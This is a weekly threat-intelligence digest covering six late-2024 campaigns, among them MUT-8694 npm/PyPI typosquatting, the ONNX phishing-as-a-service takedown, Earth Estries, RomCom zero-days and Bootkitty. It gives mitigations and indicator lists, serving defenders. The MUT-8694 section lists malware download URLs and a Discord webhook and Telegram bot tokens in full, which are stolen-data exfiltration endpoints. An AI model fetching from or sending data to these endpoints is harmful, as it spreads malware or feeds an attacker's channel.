Weekly Threat Landscape Digest – Week 48

1. MUT-8694: NPM and PyPI Malicious Campaign

A sophisticated supply chain attack targeting npm and PyPI repositories has been identified. The threat actor, designated as MUT-8694, uses techniques like typosquatting to distribute malware, including Blank Grabber and Skuld Stealer, primarily targeting Windows users.

Indicators of Compromise (IoCs):

File Hashes (SHA256):

• CBLines.exe (Blank Grabber): 9247039186ec01688d19be3ade8e18fa086301145b7c00cc24465147764c63b8
• RobloxPlayerLauncher.exe: 5c4c6ef3aed460f7ea15025bc160768e00c988747b943c99faf9f09b73f86e18
• cmd.exe: b3ce55c72f4e23252235f9698bd6078880ceaca310ba16ee859a5a2d6cc39a92

Malicious URLs:

• https://github[.]com/holdthatcode/e/raw/main/CBLines.exe
• https://eed964e7-461c-4428-9c46-808d77ede57c-00-26f8c6izoatcc.worf.replit[.]dev/skuld
• https://eed964e7-461c-4428-9c46-808d77ede57c-00-26f8c6izoatcc.worf.replit[.]dev/blank
• https://eed964e7-461c-4428-9c46-808d77ede57c-00-26f8c6izoatcc.worf.replit[.]dev/empyrean
• https://discord[.]com/api/webhooks/1296197362108338248/k492vQ1I3SDXcmvWcvsy2EcSUzrwhNmILrYhR3qSF8R7tkcE-C5GgZSxuS3IlNschBWg
• https://api.telegram[.]org/bot7546407054:AAGwtti94gRjmoXnuSTcg7u0_qsGj7uoXqo/getUpdates
• https://api.telegram[.]org/bot7546407054:AAGwtti94gRjmoXnuSTcg7u0_qsGj7uoXqo/getWebhookInfo
• https://api.telegram[.]org/bot7546407054:AAGwtti94gRjmoXnuSTcg7u0_qsGj7uoXqo/getMe

Mitigation:

• Verify the authenticity of packages and monitor for suspicious activity.
• Regularly update and patch development environments.

Reference:

• https://securitylabs.datadoghq.com/articles/mut-8964-an-npm-and-pypi-malicious-campaign-targeting-windows-users/

2. Microsoft Disrupts ONNX Phishing-as-a-Service

Microsoft disrupted the operations of ONNX (Caffeine/FUHRER), a phishing-as-a-service platform operational since 2017. The action included the seizure of 240 domains used to target Microsoft 365, Google, Dropbox, and other tech services with phishing attacks.

Key Tactics:

• Quishing (QR Code Phishing): PDF attachments with malicious QR codes redirected victims to fake login pages.
• 2FA Bypass: Kits included mechanisms to intercept two-factor authentication codes.
• Obfuscation: Encrypted JavaScript evaded anti-phishing detection tools.

Outcome:

The operation was disrupted in June 2024 after researchers identified the operator, Abanoub Nady (MRxC0DER). Microsoft secured a court order to sever access to malicious infrastructure and prevent further use of the phishing domains.

Mitigation:

• Train employees to recognize phishing tactics, especially QR code-based attacks.
• Avoid scanning QR codes from unknown sources and enforce MFA for accounts.

Reference:

• https://www.bleepingcomputer.com/news/security/microsoft-disrupts-onnx-phishing-as-a-service-infrastructure/

3.Russia-Aligned TAG-110 Targets Asia and Europe

TAG-110, a Russia-aligned threat group linked to BlueDelta (APT28), has been conducting cyber-espionage campaigns targeting governments, human rights groups, and educational institutions in Central Asia, East Asia, and Europe. The group uses HATVIBE, an HTML application loader, and CHERRYSPY, a Python-based backdoor, to exfiltrate sensitive data and monitor victim systems.

Key Highlights:

• Targets: Government entities, human rights groups, and educational institutions.
• Malware Used:
  • HATVIBE: A loader delivered via phishing emails or exploited vulnerabilities (e.g., Rejetto HTTP File Server). Uses obfuscation techniques such as VBScript encoding and XOR encryption.
  • CHERRYSPY: Complements HATVIBE for secure data exfiltration, using encryption methods like RSA and AES for C2 communication.
• Impact: 62 victims across 11 countries, including Kazakhstan, Kyrgyzstan, and Uzbekistan, since July 2024.

Mitigation:

• Deploy Snort, Suricata, and YARA rules to detect activity.
• Monitor for IoCs and patch vulnerabilities such as CVE-2024-23692.
• Train employees on phishing detection and enforce MFA.

References:

• https://www.recordedfuture.com/research/russia-aligned-tag-110-targets-asia-and-europe
• https://go.recordedfuture.com/hubfs/reports/CTA-RU-2024-1121.pdf

4. Chinese APT Group Earth Estries Targets Critical Infrastructure

Earth Estries, a Chinese advanced persistent threat (APT) group, has been actively targeting critical infrastructure sectors, including telecommunications, government entities, and NGOs, across regions like Asia-Pacific, the US, the Middle East, and South Africa. Using sophisticated malware like GHOSTSPIDER, SNAPPYBEE, and DEMODEX Rootkit, the group conducts prolonged cyber-espionage campaigns.

Key Insights

• Primary Targets: Telecommunications providers, government agencies, technology firms, NGOs, and consulting companies.
• Attack Techniques:
  • Exploiting vulnerabilities in public-facing servers for initial access.
  • Using living-off-the-land binaries (LOLBINs) such as WMIC.exe and PSEXEC.exe for lateral movement.
  • Deploying custom malware for persistence and espionage.
• C&C Infrastructure: Complex operations with shared tools and domains overlapping with other Chinese APTs.

Malware Overview

1. GHOSTSPIDER: Multi-modular backdoor with secure C&C communication via TLS.
2. SNAPPYBEE: Advanced malware facilitating data exfiltration.
3. DEMODEX Rootkit: Found in compromised vendor networks linked to telecommunications providers.

Indicators of Compromise (IoCs)

• C&C Domains:
  • api[dot]solveblemten[dot]com
  • esh[dot]hoovernamosong[dot]com
• IP Address:
  • 158.247.222[dot]165

References: https://industrialcyber.co/ransomware/chinese-apt-group-earth-estries-targets-critical-infrastructure-sectors-with-advanced-cyber-attacks/ 

5.RomCom APT Exploits Firefox and Windows Zero-Day Vulnerabilities

The RomCom APT Group (aka Storm-0978, Tropical Scorpius) exploited two zero-day vulnerabilities to deploy the RomCom backdoor:

• CVE-2024-9680 (Firefox): Use-after-free bug in the animation timeline feature (Critical, CVSS 9.8).
• CVE-2024-49039 (Windows): Privilege escalation in Task Scheduler (High, CVSS 8.8).

Attack Details

Method: Victims were redirected to fake websites (e.g., economistjournal[.]cloud) hosting exploits.

Outcome: Sandbox escape, privilege escalation, and installation of RomCom backdoor for command execution and payload delivery.

IOCs:

• economistjournal[.]cloud
• redjournal[.]cloud

References: 

https://thehackernews.com/2024/11/romcom-exploits-zero-day-firefox-and.html

https://www.infosecurity-magazine.com/news/romcom-apt-zeroday-flaws-firefox/ 

6.Bootkitty: First UEFI Bootkit Targeting Linux

Bootkitty is the first UEFI bootkit malware targeting Linux systems, discovered in November 2024. Developed as a proof-of-concept by BlackCat, it exploits vulnerabilities to bypass Secure Boot and manipulate the Linux kernel.

Key Details

• Purpose: Disable kernel signature checks and load malicious modules.
• Exploited Vulnerability:
  • CVE-2023-40238 (LogoFAIL): Bypasses Secure Boot using tampered BMP images.
• Targets: Limited to certain Ubuntu distributions and hardware from Acer, HP, Fujitsu, and Lenovo.
• Artifacts: Includes bootkit.efi, kernel module BCDropper, and ELF binary BCObserver.

Mitigation

• Enforce Secure Boot with validated certificates.
• Apply firmware patches for CVE-2023-40238.
• Monitor boot processes for anomalies and reflash compromised firmware if detected.

IoCs and Resources

• IoCs: https://github.com/eset/malware-ioc/tree/master/bootkitty
• Sources: https://thehackernews.com/2024/11/researchers-discover-bootkitty-first.html
  https://www.bleepingcomputer.com/news/security/researchers-discover-bootkitty-first-uefi-bootkit-malware-for-linux/